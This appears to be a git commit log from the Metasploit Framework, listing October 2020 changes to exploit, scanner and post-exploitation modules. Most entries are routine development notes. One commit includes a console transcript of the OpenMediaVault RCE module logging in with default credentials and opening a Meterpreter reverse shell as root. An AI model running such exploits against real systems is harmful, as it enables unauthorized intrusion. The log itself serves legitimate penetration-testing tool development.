C4ssandre 49dbff8c27 Correction of a little wrong error code in return value. 2020-10-28 16:05:51 +00:00
C4ssandre 53d358dd33 Update of a comment. 2020-10-28 16:00:28 +00:00
C4ssandre f9b0aecc8f Changing debug system. Now, dprintf prints readable and filterable output logs. Debug boolean defined in entry point was removed. 2020-10-28 15:52:18 +00:00
Grant Willcox 1ad24fb5d0 Fix up dns_axfr function output so that we have start the output on a new line for better clarity 2020-10-28 09:41:19 -05:00
Grant Willcox 85c3058e7d Delete the unused axfr function from auxiliary/gather/enum_dns 2020-10-28 09:34:13 -05:00
Metasploit 3590a6f3d9 automatic module_metadata_base.json update 2020-10-28 09:01:15 -05:00
Grant Willcox b0455d36e3 Land #14313, Add service stub encoder validation 2020-10-28 08:56:37 -05:00
h00die 0abdaf9f67 WIP 2020-10-27 21:30:46 -04:00
h00die c11d07aed2 more cleanup 2020-10-27 17:53:30 -04:00
Graeme Robinson bb9464801e Make changes suggested in review
* Add better explanation of public-api-port option in documentation
* Add example in scenarios where admin API is on different host to
public API (therefore public-api-port option must be used)
* Add targeturi option
* Add version number that has been tested in 2 places in documentation
2020-10-27 21:13:45 +00:00
Grant Willcox b506005438 Fix up error whereby changes didn't account for connection errors and would return incorrect results 2020-10-27 15:53:54 -05:00
Grant Willcox ab7ed90457 Add in fixes from Spencer's review so we treat the zone object as an array not as a string, like we should have been doing 2020-10-27 15:20:29 -05:00
Quentin Kaiser 19befd79f4 Fix documentation. 2020-10-27 20:33:01 +01:00
Quentin Kaiser 8750ae5712 Add CVE identifier and references to blog post and security advisory from Pulse. 2020-10-27 20:12:19 +01:00
Quentin Kaiser d54be7d007 Merge branch 'master' into enum_pulsesecure 2020-10-27 20:07:25 +01:00
Quentin Kaiser 3864f980d3 That email address won't be read in the foreseeable future. 2020-10-27 20:05:36 +01:00
h00die 9c3b62f071 sqli help needed 2020-10-27 12:09:22 -04:00
Alan Foster 902297d199 Add service stub encoder validation 2020-10-27 15:27:24 +00:00
Alan Foster 2b306abfee Update debug command connection name logging 2020-10-27 12:54:27 +00:00
Niboucha Redouane 17c7c4fdbe Fix issues 2020-10-27 00:55:06 +01:00
Grant Willcox 7d3bd6aa41 Relocate comment that was misplaced 2020-10-26 17:57:56 -05:00
Grant Willcox f1dc4fd6fc Fix up the other Regex so it keeps backwards compatability and also supports newer versions 2020-10-26 17:55:19 -05:00
Jeffrey Martin aa0c590d64 Land #14234, updates Vagrantfile to support vmware_desktop 2020-10-26 17:15:50 -05:00
Grant Willcox bd57832494 First round of changes from review 2020-10-26 16:02:06 -05:00
Niboucha Redouane 3dd5c9af7a Add postgres sqli test module 2020-10-26 18:18:25 +01:00
Metasploit d3e3291bd1 Bump version of framework to 6.0.14 2020-10-26 10:46:53 -05:00
Jeffrey Martin 3f0419a014 Land #14303, Allow local exploits for RPC compatible_sessions 2020-10-26 10:26:00 -05:00
Metasploit 47a7f67dd4 automatic module_metadata_base.json update 2020-10-26 00:06:32 -05:00
Grant Willcox 479fb29691 Land #14311, Add support for ProxyUsername and ProxyPassword to enum_putty_saved_sessions.rb 2020-10-25 23:57:47 -05:00
C4ssandre 6fddb3be6a Updates of visual studio files. 2020-10-25 21:52:46 +00:00
C4ssandre 7ec20cfb0e Integration of powershell module into exploit. Now, metasploit is in charge of creating the powershell payload and transmit it to running exploit (instead of raw shellcode transformed into powershell previously). 2020-10-25 19:50:45 +00:00
HuskyHacks 3a66984808 Update enum_putty_saved_sessions.rb
updating enum_putty_saved_sesssion.rb with additional fields
2020-10-25 15:45:33 -04:00
C4ssandre d93c2d03fb Fixing a bug preventing to serve very large powershell payloads. 2020-10-25 19:00:39 +00:00
C4ssandre 64cbd7de49 Fixing typos in comments. 2020-10-25 18:57:56 +00:00
C4ssandre 868f406c2d Improvement by setting all buffers explicitly to 0 at initialization. 2020-10-25 18:52:12 +00:00
C4ssandre 567367c0ac Fixing a bug caused by base64 functions writing a long in an area expecting a short. 2020-10-25 18:41:11 +00:00
C4ssandre 8d9a0c1926 Removing extra ";" 2020-10-25 18:30:13 +00:00
Grant Willcox f0e7a225a2 Land #14307, Remove .keep relics from svn to git conversion 9yrs ago 2020-10-24 12:35:36 -05:00
Grant Willcox bdb9dd59b8 Land #14305, Fix dead links in CONTRIBUTING.md 2020-10-24 12:26:54 -05:00
h00die 87b55afd44 better code optimization 2020-10-24 10:09:10 -04:00
h00die 79384e85f3 remove old .keep files in non-empty directories 2020-10-24 09:41:55 -04:00
Justin Steven effe43f6d7 Fix dead links 2020-10-24 19:33:23 +10:00
Grant Willcox 65fcf67ca5 Land #14279, Fix incorrect offset in BPF sign extension LPE 2020-10-23 16:02:13 -05:00
Grant Willcox 9e111d7fdf Add in compiled version of the exploit to meet Rapid7 compliance guidelines on having Rapid7 employees submit compiled binaries only 2020-10-23 16:01:00 -05:00
Jared Stroud 24c2235c3f Updated w/ fail msg if dump is not created 2020-10-23 16:02:52 -04:00
Metasploit c62998d092 automatic module_metadata_base.json update 2020-10-23 14:44:02 -05:00
bwatters 294269bd4e Land #14300, Fixes and updates for the DRuby RCE module
Merge branch 'land-14300' into upstream-master
2020-10-23 14:36:04 -05:00
b4rtik 9779bbef77 Fix parameter managing
Fix a problem running assemblies with Main signature (string[] args) and no passed parameters
2020-10-23 21:14:10 +02:00
Adam Cammack d5d100ebb9 Allow local exploits for RPC compatible_sessions 2020-10-23 12:38:13 -05:00
Spencer McIntyre 8b2227004d Move the details back into the struct field for the array interface 2020-10-23 10:10:36 -04:00
Spencer McIntyre 291c883db8 Don't alter the os_name or os_flavor keys in report_host 2020-10-23 09:48:33 -04:00
Jared Stroud 6cd4ffeffa removing support for shell from options 2020-10-22 20:00:45 -04:00
Jared Stroud 9bee758af9 Updating execution based on bcoles feedback 2020-10-22 19:46:32 -04:00
Jared Stroud c6690e6494 Adding Avast memory dump docs 2020-10-22 19:34:14 -04:00
Spencer McIntyre 3fdeb1933d Report the host details when scanning for MS17-010 2020-10-22 17:45:37 -04:00
Adam Cammack 4fb0c4ac8a Land #14299, Bump Ruby to 2.7.2 2020-10-22 13:54:35 -05:00
Metasploit e8f283aa31 Bump version of framework to 6.0.13 2020-10-22 12:02:27 -05:00
Spencer McIntyre ba17a5d67f Apply rubocop fixes for the DRuby RCE module 2020-10-22 12:35:35 -04:00
Spencer McIntyre 8aca08f80b Add the DRuby RCE check method 2020-10-22 12:34:51 -04:00
Spencer McIntyre 34e41e66ec Fix the syscall DRuby target by adding a small delay before execve 2020-10-22 12:18:12 -04:00
Spencer McIntyre 49145bfd31 Don't start the DRuby service, it appears unnecessary 2020-10-22 12:15:39 -04:00
Metasploit 745db48a61 automatic module_metadata_base.json update 2020-10-22 09:00:02 -05:00
bwatters 2f2d43e3bb Land #14295, update payload sizes from 2.0.22 gem
Merge branch 'land-14295' into upstream-master
2020-10-22 08:52:18 -05:00
Brendan Coles 6258d5b561 Land #14296, Move mercury_login module docs to documentation directory 2020-10-22 13:24:54 +00:00
Jared Stroud ff220946e3 Updating loot placeholder to take memdump 2020-10-21 23:36:51 -04:00
Jared Stroud cb3e7b326d Updated to store content in loot db 2020-10-21 23:10:10 -04:00
Jared Stroud 9be68defc7 Initial commit of Avast memory dumping post-module 2020-10-21 22:58:24 -04:00
spassino 913aee2a45 Modified zabbix login to work with newer versions of zabbix
Added documentation for zabbix login
2020-10-21 21:14:57 -04:00
Metasploit 1eb4bb2cf2 automatic module_metadata_base.json update 2020-10-21 17:00:03 -05:00
Spencer McIntyre 3dc232aa9a Land #14289, Add version check to exploit/windows/http/exchange_ecp_dlp_policy 2020-10-21 17:52:38 -04:00
Jeffrey Martin a8d41c59e2 update payload sizes from 2.0.22 gem 2020-10-21 16:35:43 -05:00
h00die eb665dae7a warn of possible external modules which are -x 2020-10-21 17:00:32 -04:00
h00die bda836dc65 warn of possible external modules which are -x 2020-10-21 16:57:22 -04:00
h00die 5890bc45b5 move docs out of exploits folder 2020-10-21 16:37:02 -04:00
Spencer McIntyre 50a479e675 Alter how the check code details are handled for compatibility 2020-10-21 16:30:00 -04:00
Spencer McIntyre 2077f241c1 Support and use CheckCode details to share relevant information
Modules that can be used as check modules should be able to share
information with their exploit counterpart.
2020-10-21 16:29:31 -04:00
Metasploit c194ec2d0c automatic module_metadata_base.json update 2020-10-21 10:27:00 -05:00
adfoster-r7 a362b6785d Land #14290, set pid to nil for MS17-010 SMB1 clients 2020-10-21 16:20:08 +01:00
Grant Willcox 3d79cee016 Land #14293, Sync Gemfile.lock metasploit-payloads version to 2.0.22 to ensure bundler doesn't error on #14267. 2020-10-21 09:18:53 -05:00
Jeffrey Martin f7612c13e5 sync Gemfile.lock for version missed in #14267 2020-10-21 09:05:23 -05:00
Spencer McIntyre b457191eaa Set pid to nil for MS17-010 SMB1 clients 2020-10-20 17:09:51 -04:00
William Vu e4fb76d74f Add version check to exchange_ecp_dlp_policy
And update modules/exploits/windows/http/sharepoint_ssi_viewstate.rb.
2020-10-20 14:32:43 -05:00
Metasploit 78bdf1e5a7 automatic module_metadata_base.json update 2020-10-20 13:32:21 -05:00
William Vu 3970b69734 Land #14229, Telerik UI for ASP.NET AJAX exploit
CVE-2017-11317 && CVE-2019-18935
2020-10-20 13:24:35 -05:00
Spencer McIntyre b58ed7f909 Update the Telerik RAU module metadata and add the TARGETURI option 2020-10-20 13:48:59 -04:00
Jeffrey Martin 005150bb1a bump default ruby version to 2.7.2
updates Docker container to 2.7.2

Warnings for python2 support [abound](https://wiki.alpinelinux.org/wiki/Release_Notes_for_Alpine_3.12.0).
```
DEPRECATION: Python 2.7 reached the end of its life on January 1st, 2020. Please upgrade your Python as Python 2.7 is no longer maintained. pip 21.0 will drop support for Python 2.7 in January 2021. More details about Python 2 support in pip can be found at https://pip.pypa.io/en/latest/development/release-process/#python-2-support pip 21.0 will remove support for this functionality.
```
2020-10-20 11:28:06 -05:00
Spencer McIntyre 9d1642c987 Land #14288, Parameterise args to popen3() 2020-10-20 11:57:52 -04:00
Spencer McIntyre 57aef4367c Adjust the exploit timeout and set the default RPORT for Telerik RAU 2020-10-19 19:31:14 -04:00
Justin Steven d1528cc0aa Paramaterise args to popen3() 2020-10-20 08:12:33 +10:00
Metasploit 42c5107c08 automatic module_metadata_base.json update 2020-10-19 16:03:59 -05:00
bwatters 1e568a6d1b Merge branch 'land-14179' into upstream-master 2020-10-19 15:55:25 -05:00
Spencer McIntyre 5aae468be3 Land #14267, Update metasploit-payloads gem to 2.0.22 2020-10-19 13:29:07 -04:00
Metasploit 31d5e94e6b automatic module_metadata_base.json update 2020-10-19 12:23:39 -05:00
Spencer McIntyre 3052458422 Land #14285, Update documentation/modules/exploit/windows/http/sharepoint_ssi_viewstate.md 2020-10-19 13:19:06 -04:00
William Vu 253928570b Update module doc 2020-10-19 11:18:00 -05:00
Metasploit 9d91d739ad automatic module_metadata_base.json update 2020-10-19 09:32:14 -05:00
Spencer McIntyre 0f344b0661 Land #14265, Add SharePoint Server-Side Include (SSI) and ViewState RCE (CVE-2020-16952) 2020-10-19 10:27:58 -04:00
Spencer McIntyre a05f8a721b Print what the web.config loot path is 2020-10-19 10:27:41 -04:00
Metasploit 49c114a456 automatic module_metadata_base.json update 2020-10-19 07:04:06 -05:00
adfoster-r7 76d5a4e444 Land #14258, add documentation and rubocop for several post/windows/gather modules 2020-10-19 12:59:06 +01:00
h00die bab5377290 docs are md not rb 2020-10-19 05:19:27 -04:00
h00die 4eac4882b5 more accurate external loader error 2020-10-18 21:03:13 -04:00
h00die 5dcee8c8a9 add download ref 2020-10-18 11:20:06 -04:00
h00die f3a633b89e cve-2018-14847 2020-10-18 11:13:16 -04:00
Gustaf Blomqvist c5751a240b Fix incorrect offset in BPF sign extension LPE
The uid field of the cred struct is normally the second field, followed
by the gid field. The first field is of type atomic_t, which has the
size of an int. Since the size of an int is usually 4 bytes, the uid is
normally located at an offset of 4 bytes from the start of the cred
struct, and not 8. Since the uid also is int-sized, the code set
test_uid to the gid, making the exploit fail for cases where uid != gid.
2020-10-17 19:46:35 -04:00
h00die 252a5ace25 winbox_fileread 2020-10-17 13:12:25 -04:00
dwelch-r7 1b28d21f0e Land #14240, Add tab completion for run command
Add tab completion for run command
2020-10-16 11:24:56 +01:00
Karn Ganeshen a71d0576db doc updated with new logs 2020-10-16 03:24:27 +05:30
Karn Ganeshen 9a148bcaf4 new updates to module
added nil response and good response case, target hostname, and os details are now captured in hosts and services db, some cosmetics, fixed date format, and timeout handling.
2020-10-16 03:17:12 +05:30
Jeffrey Martin 56a07259a7 Guard and notify for missing encoders
When an encoder module is incorrectly entered or does not exist
continue the encoding process and log the invalid entry to console.
2020-10-15 15:02:02 -05:00
Alan Foster 832e2263b0 Ensure consistent tab completes 2020-10-15 19:55:54 +01:00
William Vu 4cb08f7426 Address outstanding issues 2020-10-15 13:24:08 -05:00
Metasploit 2e1122ca98 automatic module_metadata_base.json update 2020-10-15 12:53:47 -05:00
Grant Willcox 43e412f3f2 Land #13817, CVE-2019-1458 chrome sandbox escape 2020-10-15 12:45:47 -05:00
Metasploit add84c70d1 Bump version of framework to 6.0.12 2020-10-15 12:02:32 -05:00
Grant Willcox 849dbeca5c Fix up bad merge commit 2020-10-15 11:53:39 -05:00
ide0x90 d6a91f8965 Remove some unnecessary comments 2020-10-16 00:34:12 +08:00
ide0x90 8d02a1a4c6 Use Rex::MIME for building MIME message 2020-10-16 00:26:10 +08:00
Tim W 87104a7236 Update docs and make them msftidy_docs.rb compliant 2020-10-15 10:59:46 -05:00
Grant Willcox 59f74438da Rename the LPE exploit to a more appropriate name since their could be future bugs in NtUserMessageCall and also update the description info a bit more 2020-10-15 10:59:44 -05:00
Grant Willcox 7c08a42401 Revamp the check method so that it will check across a lot more versions of Windows and provide full coverage for CVE-2019-1458 2020-10-15 10:59:44 -05:00
Grant Willcox f2899186e4 Add in first round of initial updates to fix review comments 2020-10-15 10:59:40 -05:00
Tim W dcc322436b Update documentation files and module description to more accurately describe what the cause of the LPE bug for CVE-2019-1458 is. also apply RuboCop edits. 2020-10-15 10:58:58 -05:00
Grant Willcox b932ed5225 Recompile the exploit.dll DLL for CVE-2019-1458 as per Rapid7 policies 2020-10-15 10:58:56 -05:00
Tim W c38064b022 Apply rubocop edits and update documentation 2020-10-15 10:58:38 -05:00
Tim W a3772d43d4 set InitialAutoRunScript to post/windows/manage/priv_migrate 2020-10-15 10:58:08 -05:00
Tim W 00d209425b add documentation 2020-10-15 10:58:08 -05:00
Tim W cf5ca76b5e fix check function 2020-10-15 10:58:07 -05:00
Tim W 12c5f4f916 CVE-2019-1458 chrome sandbox escape initial commit 2020-10-15 10:57:46 -05:00
Karn Ganeshen 2fed443179 Apache Zookeeper Info Disclosure Documentation 2020-10-15 17:32:12 +05:30
Karn Ganeshen 262b51a659 Apache Zookeeper Information Disclosure
Adding new module for Zookeeper info disclosure
2020-10-15 16:54:38 +05:30
ide0x90 8d43fa4848 Module can now use mkfile+put method to exploit vulnerability. 2020-10-15 17:46:40 +08:00
William Vu 1a341ae931 Add SharePoint SSI and ViewState RCE
CVE-2020-16952
2020-10-14 17:45:15 -05:00
Graeme Robinson a8341d72ae skip cleanup when using check method 2020-10-14 17:17:09 +01:00
Spencer McIntyre 47367d31bf Update metasploit-payloads gem to 2.0.22 2020-10-14 11:56:07 -04:00
Graeme Robinson 97f9c67ff1 Use class's cleanup method 2020-10-14 16:25:42 +01:00
Metasploit 7ddae49fab automatic module_metadata_base.json update 2020-10-13 14:57:09 -05:00
Grant Willcox aa5958f1f5 Land #14262, Correct description of services provided by Cloudflare 2020-10-13 14:48:18 -05:00
Graeme Robinson f6b5053666 Add exploit/multi/http/kong_gateway_admin_api_rce 2020-10-13 16:56:34 +01:00
Pedro Ribeiro 9fe5e4d036 Create docs 2020-10-12 14:29:46 +07:00
h00die 39a623f3e0 docs for domain post modules 2020-10-11 18:53:28 -04:00
h00die f75367d8bd docs and rubocop 2020-10-11 17:44:21 -04:00
ide0x90 b9df68cbb6 Fix module according to Rubocop, make documentation follow standard. 2020-10-11 19:04:06 +08:00
stasinopoulos e8823e2630 Minor update 2020-10-11 10:38:58 +03:00
youkergav c855857506 Cleaned up more code 2020-10-11 02:26:02 -04:00
h00die dfecea03fc spelling 2020-10-10 21:04:09 -04:00
ide0x90 57b0f30e37 Add new module for WordPress File Manager unauth RCE (CVE-2020-25213) 2020-10-11 01:20:28 +08:00
stasinopoulos 361d16b860 Added fail_with and removed redundant else after return. 2020-10-10 19:25:28 +03:00
Anastasios Stasinopoulos 84908108fa Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-10 18:59:03 +03:00
h00die 3b5e05aff4 update avira password gather, add raw-md5u processing 2020-10-10 11:47:41 -04:00
youkergav 1cba6080cd Cleaned up code 2020-10-09 22:04:26 -04:00
youkergav d623d85040 Added AutoCheck mixin 2020-10-09 19:45:28 -04:00
Grant Willcox d79537e88c Fix up the DNS enumeration library so that AXFR records don't have stray [ and ] characters printed in the output 2020-10-09 14:01:09 -05:00
Faiz Azhar 193d15381e Cloudflare (NYSE:NET) is an independent company and unrelated to Amazon (NASDAQ: AMZN) 2020-10-10 00:13:43 +08:00
cgranleese-r7 9e16fb8c4f Add module option tab completion to run command 2020-10-09 14:35:48 +01:00
stasinopoulos a3fac9619c Minor updates 2020-10-09 16:32:44 +03:00
stasinopoulos 9338f9ca4c Updates regarding the logic surrounding login and check 2020-10-09 14:07:22 +03:00
youkergav a59558f03c Made password optional parameter 2020-10-09 06:33:57 -04:00
youkergav 5726db44d0 Bug fixed 2020-10-09 06:01:25 -04:00
youkergav 583e77db60 Cleaned up code 2020-10-09 05:38:54 -04:00
Anastasios Stasinopoulos 51fef32684 Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-09 12:29:16 +03:00
Anastasios Stasinopoulos 5184241315 Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-09 12:29:08 +03:00
youkergav 263b6bc070 Merge branch 'master' of github.com:rapid7/metasploit-framework into su_login 2020-10-09 05:26:48 -04:00
stasinopoulos ded297a756 Update openmediavault_rpc_rce.md 2020-10-09 12:13:22 +03:00
stasinopoulos 9fc9b51c0f Multiple fixes and updates 2020-10-09 11:56:11 +03:00
youkergav 23c6c415eb Added python alternative and check function 2020-10-09 03:58:55 -04:00
stasinopoulos c165b6b392 Fix regarding redundant else after return. 2020-10-09 08:27:43 +03:00
Metasploit 05c389a6d5 automatic module_metadata_base.json update 2020-10-08 17:36:23 -05:00
adfoster-r7 8fa15cb92a Land #14243, Fix up disclosure date for zentao_pro_rce 2020-10-08 23:29:32 +01:00
Grant Willcox 443f26410e Fix up disclosure date 2020-10-08 15:30:56 -05:00
Metasploit acce929575 automatic module_metadata_base.json update 2020-10-08 14:59:59 -05:00
Grant Willcox 71b9b5c2e7 Land #14235, Patch smart_hashdump so it doesn't skip RID 1001 when dumping hashes 2020-10-08 14:51:52 -05:00
Metasploit 13769529e2 Bump version of framework to 6.0.11 2020-10-08 14:15:24 -05:00
Grant Willcox a2e15235b8 Make fixes to documentation for smart_hashdump.md to fix msftidy issues and improve readability 2020-10-08 14:07:44 -05:00
stasinopoulos 6c60a4a39c Update regarding using to_json 2020-10-08 20:51:33 +03:00
kernelsmith bbec35f8ba moves v.gui comment to appropriate location(s) 2020-10-08 11:59:09 -05:00
Anastasios Stasinopoulos f85ec97233 Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-08 19:56:00 +03:00
Anastasios Stasinopoulos c3d37bde0d Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-08 19:55:22 +03:00
Anastasios Stasinopoulos 23685cdd66 Update modules/exploits/unix/webapp/openmediavault_rpc_rce.rb
Co-authored-by: bcoles <bcoles@gmail.com>
2020-10-08 19:54:37 +03:00
Metasploit 3a99212859 automatic module_metadata_base.json update 2020-10-08 11:41:44 -05:00
Grant Willcox 7cc9d663dc Land #14242, Remove modules whose deprecation date has past 2020-10-08 11:34:00 -05:00
Grant Willcox f5dded2274 Land #14233, Always show module actions within the info command 2020-10-08 11:03:18 -05:00
Spencer McIntyre 3431d97c64 Remove modules whose deprecation date has past 2020-10-08 10:56:37 -04:00
Metasploit c58309ca3d automatic module_metadata_base.json update 2020-10-08 09:50:03 -05:00
Grant Willcox 87b1facc5b Land #14238, Update sap_service_discovery.rb to support SAP IGS server discovery 2020-10-08 09:43:33 -05:00
bwatters f2462fb216 Land #14230, Update metasploit-payloads gem to 2.0.16
Merge branch 'land-14230' into upstream-master
2020-10-08 09:19:38 -05:00
Metasploit 8abedc5a99 automatic module_metadata_base.json update 2020-10-08 08:56:21 -05:00
Grant Willcox 69c68823d2 Land #14226, convert myworkspace.id to myworkspace_id for no db compat 2020-10-08 08:49:53 -05:00
Vladimir Ivanov d2ee5a838a Update sap_service_discovery.rb
Add port 40080 - SAP Internet Graphics Server [HTTP]
2020-10-08 13:51:44 +03:00
stasinopoulos 9577282ac8 Altered default PAYLOAD in Target "1" (i.e. "Unix In-Memory") 2020-10-08 09:40:26 +03:00
0x44434241 4e40ae5d92 Spelling fix; 'controler' -> 'controller'. 2020-10-08 13:13:15 +09:00
0x44434241 73e826486f Adding some basic documentation, as it was missing for this module. 2020-10-08 12:58:31 +09:00
0x44434241 659138d6ef Removing unused variables as per rubocop suggestions. 2020-10-08 12:24:58 +09:00
0x44434241 fb04106c2f Applying suggested rubocop formatting fixes. 2020-10-08 12:22:34 +09:00
0x44434241 ac4159b657 Removing 'skip rid 1001' from hashdump loop as per issue #14094. 2020-10-08 10:50:40 +09:00
kernelsmith 444215ffd0 updates Vagrantfile to support vmware_desktop
changes box from ubuntu/bionic64 to hashicorp/bionic64 as Canonical doesn't have a vmware box

makes it obvious how to allow the VM to show up in the hypervisor GUI

updates vmware provider to be the official vmware_desktop provider

Adds a VM display name option

Changes gpg key imports and rvm install to match what's in omnibus

handles stderr better to avoid some extra warnings unless there's a real failure

Installs Ruby only if it's not installed already (nicer if have to reprovision the box)

switches back to gem install bundler due to upstream bundler/ruby changes

adds --quiet to gem install bundler to avoid progress bar junk
2020-10-07 17:23:28 -05:00
Alan Foster a933e10252 Show actions within info command 2020-10-07 23:20:31 +01:00
Grant Willcox 339c1941ef Add in myworkspace.id patch for the other missing modules 2020-10-07 17:08:00 -05:00
Grant Willcox a69ce8ae04 Add missing Juniper case 2020-10-07 17:03:34 -05:00
bwatters 63448ff0bd Update metasploit-payloads gem to 2.0.16 2020-10-07 15:44:03 -05:00
Spencer McIntyre 9cb3d3e091 Land #14070, Tab-completion improvements for modules with conditional OPTIONS 2020-10-07 16:33:55 -04:00
Spencer McIntyre e1b4d17de6 Use Array#delete_if like suggested 2020-10-07 15:57:28 -04:00
Spencer McIntyre 99bd146428 Fix version-related logic for the Telerik RAU module 2020-10-07 15:03:11 -04:00
Spencer McIntyre fb569a24ee Add module documentation for Telerik RAU Deserialization 2020-10-07 13:40:10 -04:00
Metasploit 01263e5f91 automatic module_metadata_base.json update 2020-10-07 12:18:19 -05:00
Grant Willcox a2675c13e8 Land #14213, Add disclosure date rubocop linting rule - enforce iso8601 disclosure dates 2020-10-07 12:09:59 -05:00
Grant Willcox 2c391e9edc Fix up last of the module that had incorrect disclosure dates 2020-10-07 12:09:35 -05:00
Metasploit 068824aa31 automatic module_metadata_base.json update 2020-10-07 11:19:55 -05:00
Grant Willcox 64cc47d654 Land #14163, SAP IGS XMLCHART XXE (CVE-2018-2392 and CVE-2018-2393) 2020-10-07 11:08:23 -05:00
Ivanov Vladimir 32b489408e Update docs 2020-10-07 10:12:10 -05:00
Ivanov Vladimir fa7b711d60 Change ltype in loot 2020-10-07 10:12:09 -05:00
Grant Willcox 12095f9174 Make minor updates to the error messages 2020-10-07 10:12:09 -05:00
Spencer McIntyre 2edf0390f7 Apply rubocop fixes 2020-10-07 11:11:25 -04:00
Ivanov Vladimir df86b0c7c2 Update script to ensure action_file_read will correctly use fail_with, and to update the return types of send_first_request. 2020-10-07 10:11:12 -05:00
Grant Willcox 5ad2190c40 Apply updates to the module from the review process and a minor update to the documentation to note the renaming of the PATH option to URIPATH. Also update the check method so that it now works correctly and so that other functions return errors appropriately. 2020-10-07 10:08:57 -05:00
Ivanov Vladimir cc721fd64f Update several functions to apply review edits and also update the documentation accordingly. 2020-10-07 10:07:48 -05:00
Ivanov Vladimir 9ce3dc45f7 Delete default option: VERBOSE 2020-10-07 10:07:46 -05:00
Ivanov Vladimir 24d14f8816 Rename URN to PATH in several functions. Also change check function. 2020-10-07 10:04:55 -05:00
Grant Willcox 8a8dfafcc3 Rename the files and update some descriptions as there may be more XXE bugs in SAP in the future. Also update the documentation accordingly. 2020-10-07 10:04:03 -05:00
Grant Willcox 14f4de1f0c Clean up documentation to improve English and descriptions, and to also remove some excess information that was leading to some potential confusion 2020-10-07 10:04:03 -05:00
Grant Willcox fc462d2465 Clean up code to remove some extra options and to make the match() calls a bit cleaner, as well as make some of the explanations a bit neater. Also remove duplicate code from a few places 2020-10-07 10:04:02 -05:00
Grant Willcox a70cb25824 Remove all verbose options and tidy up one extra instance variable that was only used once 2020-10-07 10:04:02 -05:00
Vladimir Ivanov 7c682af98b Create sap_igs_xxe.rb and its associated documentation, and apply RuboCop fixes. 2020-10-07 10:03:09 -05:00
Spencer McIntyre adfc8f89c4 Implement version enumeration and report CVE-2017-11317 for Telerik 2020-10-07 10:27:50 -04:00
Metasploit d1e48b1358 automatic module_metadata_base.json update 2020-10-07 08:32:02 -05:00
adfoster-r7 d0778c7a54 Land #14228, Increase operations per run 2020-10-07 12:57:52 +01:00
dwelch-r7 7da99f72b8 Update schedule-stale.yml 2020-10-07 11:43:43 +01:00
stasinopoulos 7badf4eb8d Minor updates 2020-10-07 12:25:32 +03:00
stasinopoulos 23990da22d Fix regarding incorrect disclosure date format 2020-10-07 11:02:20 +03:00
stasinopoulos 44e3d11068 Rubocop check 2020-10-07 10:44:24 +03:00
stasinopoulos ca3a4cacb5 OpenMediaVault 5.5.11 Authenticated Remote Code Execution
This module exploits an authenticated PHP code injection vulnerability found in openmediavault before 4.1.36 and 5.x before 5.5.12  inclusive in the "sortfield" POST parameter of "rpc.php" page, because json_encode_safe is not used in config/databasebackend.inc. Successful exploitation allows arbitrary command execution on the underlying operating system as root.

### Usage Example
```
msf6 > use exploit/unix/webapp/openmediavault_rpc_rce
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > show options

Module options (exploit/unix/webapp/openmediavault_rpc_rce):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   HttpPassword  openmediavault   yes       Password to login with
   HttpUsername  admin            yes       User to login with
   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                         yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT         80               yes       The target port (TCP)
   SRVHOST       0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT       8080             yes       The local port to listen on.
   SSL           false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                        no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                        no        The URI to use for this exploit (default is random)
   VHOST                          no        HTTP server virtual host

Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (Linux Dropper)

msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set rhosts 192.168.56.108
rhosts => 192.168.56.108
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > set lhost 192.168.56.105
lhost => 192.168.56.105
msf6 exploit(unix/webapp/openmediavault_rpc_rce) > exploit

[*] Started reverse TCP handler on 192.168.56.105:4444
[*] 192.168.56.108:80 - Authenticating using "admin:openmediavault" credentials...
[+] 192.168.56.108:80 - Authenticated successfully.
[+] 192.168.56.108:80 - OpenMediaVault version 5.5.11 identified.
[*] 192.168.56.108:80 - Sending payload (150 bytes)...
[*] Sending stage (976712 bytes) to 192.168.56.108
[*] Meterpreter session 1 opened (192.168.56.105:4444 -> 192.168.56.108:38508) at 2020-10-07 01:16:01 -0400
[*] Command Stager progress - 100.00% done (799/799 bytes)

meterpreter > sysinfo
Computer     : 192.168.56.108
OS           : Debian 10.5 (Linux 5.7.0-0.bpo.2-amd64)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > shell
Process 1499 created.
Channel 1 created.
id
uid=0(root) gid=0(root) groups=0(root)
```
2020-10-07 09:59:45 +03:00
h00die 58cc9ca403 convert myworkspace.id to myworkspace_id for no db compat 2020-10-06 20:06:13 -04:00
Spencer McIntyre efc8485c86 Fill out module metadata and improve the check method 2020-10-06 18:00:13 -04:00
Jeffrey Martin 9a980c9c23 rescue SSLError in HTTP scanner check_setup
By capturing possible connection errors when SSL cannot be
negotiated, this update prevents early exit due to failure of a
single IP when scanning a range of IPs
2020-10-06 10:47:44 -05:00
Spencer McIntyre 9ee83e2657 Land #14028, Fix msf6 TLV_TYPE_PIVOT_STAGE_DATA_SIZE pivoting error 2020-10-06 09:11:38 -04:00
Pedro Ribeiro 74387f0859 Update rockwell_factorytalk_rce.rb 2020-10-06 12:29:40 +07:00
Pedro Ribeiro 5a6301cfea Add blog link 2020-10-06 12:26:28 +07:00
